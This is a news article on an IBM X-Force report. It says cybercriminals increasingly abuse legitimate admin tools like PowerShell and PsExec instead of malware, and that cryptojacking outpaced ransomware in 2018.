For many crooks, malware is out and PowerShell attacks are in, IBM says

Fifty-seven percent of the cyberattacks detected by IBM X-Force Threat Intelligence used common applications like PowerShell or PsExec, compared to 29 percent that used more traditional phishing attacks.
servers ethernet
After combing a C2 server, researchers believe they've uncovered a broader espionage campaign. (Getty Images)

Digital thieves are ditching traditional forms of cybercrime in favor of more subtle techniques that apparently help them avoid detection, IBM says.

Scammers are moving away from the use of malicious software, opting instead to exploit administrative tools to target business and organizations, according to a report published Tuesday by the company’s X-Force Threat Intelligence team.

Nation-state hacking groups appear to have started the trend, but it seems to have spread throughout the broader cybercriminal black market. FireEye said in 2017 it detected a suspected Iranian group using similar techniques to collect reconnaissance about global critical infrastructure companies. IBM’s report says such tactics are everywhere now.

Fifty-seven percent of the attacks IBM detected used common, otherwise benign applications like PsExec or PowerShell, a tool that can execute code from memory. Just 29 percent used more traditional phishing attacks. IBM says. This tactic enables hackers to evade antivirus protection and other common security controls.


“PowerShell is useful in data collection and analysis, but it is also favored by malicious actors who use it to forego the file system and inject malicious code directly into memory, thus enhancing obfuscation, and often evading security controls designed to detect malware deployments,” the IBM report said.

IBM’s research dovetails with previous reports from other security companies that say they have noticed an uptick in attacks that don’t rely on the typical way of hacking targets: attaching malware to an email and hoping a recipient falls for it.

Symantec last month said it detected cybercriminals using a combination of techniques to infiltrate financial companies operating throughout West Africa. In that case, thieves also used PowerShell but also relied on remote desktop protocols and Microsoft administration tools to break in to target networks. This technique sometimes is known as “living off the land,” industry jargon for using legitimate tools for nefarious purposes.

In that vein, IBM also said the number of cryptojacking attacks — the subtle hijacking of enterprise computing power for cryptocurrency mining — nearly doubled the number of ransomware attacks in 2018. Stealing computing power to mine bitcoins is much less conspicuous than bullying a company for ransom. But there’s a cost on the companies nonetheless: IT teams might receive a $10 million cloud computing bill when they’re expecting to pay a fraction of that, Stan Black, chief security and information officer at Citrix, told CyberScoop in December.

“This is about someone stealing assets that I pay for,” he said.

Latest Podcasts